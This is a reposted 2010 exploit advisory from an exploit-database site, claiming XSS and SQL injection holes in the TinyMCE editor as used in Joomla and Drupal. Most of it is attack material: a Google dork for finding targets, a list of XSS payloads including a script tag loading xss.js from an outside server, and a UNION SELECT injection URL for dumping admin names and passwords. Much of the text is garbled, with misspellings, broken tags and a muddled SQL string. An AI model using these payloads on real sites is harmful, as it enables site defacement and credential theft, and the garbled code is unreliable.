Advertisement






TinyMCE - Javascript WYSIWYG Editor xss/sql injection vurnerebility

CVE Category Price Severity
CWE-79 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2010-02-13
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010020037

Below is a copy:

===================================================================
TinyMCE - Javascript WYSIWYG Editor xss/sql injection vurnerebility
===================================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


[+] Vurnerebility:*Js tiny_mce/tiny_mce WYSIWYG{java script} vurnerebility xss-->popup 
*& SQl implemented
[+] Language :Java--,Xml
[+] lisences :LGPL
[+] Vendor : Moxiecode Systems AB
[+] support :      IE7J0/IE6.0/NS8.1-IE/NS8.1-G/FF2.0/O9.02;
[+] vendor :http://tinymce.moxiecode.com/
[+] implemented  :joomla componen,drupal..
[+] dork    :powered:powered by CMS
    :inurl"file_manager.php?type=img"
------------------------------------------------------------------------------------
--[Vulnerability sampling]--
-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------
#alert(String.fromCharCode(X1,X2,X3,X4))//";alert(String.fromCharCode(X1,X2,X3,x4))//\";
alert(String.fromCharCode(X1,X2,X3,x4))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(X1,X2,X3,x4))</SCRIPT>
#
-------------------------------------------------------------------------------------------------------------------------
#'';!--"<XSS>=&{()}'
------------------------------------------------------------------------------------
<script SRC=http//:server.com/xss.js></put_SCRIPT>
<a hreef="http://www.server://www.server.com/server.com/">put_code</a>
<a href="http://www.server.com./">put_code</a>
<marquee>http://server.net">put_code</marquee>
<a href="//srver.net">put_code</A>
<a href="http://0x1x.01x0061.0x6/">put_code</a>
------------------------------------------------------------------------------------
[Thread img src]

"<img src=javascript:alert(&quot;XSS&quot;)>"
"<img src="javascript:alert('Put_script');"> [or] <IMG SRC=javascript:alert('put_Script')>"
"<IMG SRC=javascript:alert(String.fromCharCode(X1,X2,X3,X4))>"
"<img src=`javascript:alert("put_xss")`>"
"<IMG SRC="javascript:alert('XSS');">"

<IMG
SRC
=
"
write javascript vertikal position exmpl:
j
s
:
a
l
e
r
t
(
'
put code vertical position
'
)
)
;
>

"<IMG SRC=>"

try conversion---->use RainbowText from <IMG SRC=>
make compilign:
<font color="#ff0000">&lt;</font><font color="#ff4200">I</font><font color="#ff8500">M</font><font color="#ffc700">G</font> <font color="#f3ff00">S</font><font color="#b1ff00">R</font><font color="#6eff00">C</font><font color="#2cff00">=</font><font color="#00ff16">&amp;</font><font color="#00ff58">#</font><font color="#00ff9b">1</font><font color="#00ffdd">;</font><font color="#00ddff">&amp;</font><font color="#009bff">#</font><font color="#0058ff">2</font><font color="#0016ff">;</font><font color="#2c00ff">&amp;</font><font color="#6e00ff">#</font><font
color="#b100ff">3</font><font color="#f300ff">;</font><font color="#ff00c7">&amp;</font><font color="#ff0085">#</font><font color="#ff0042">3</font><font color="#ff0000">&gt;</font>
-------------------------------------------------------------------------------------------------------------------------------------------------------------

SQL implemented:Injection vulnerability---->installed on c-panel(joomla---sampling write tabel view/editor)

Exploit :server/patch/index.php?menuID=-value union select//**//users/2,3,4,5/password//**//from/2,3,4,5//,Group_CONCAT(name,CHAR(3,4,5),wachtwoord),2,3 from admin--




# ~  - [ [ : Inj3ct0r : ] ]


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.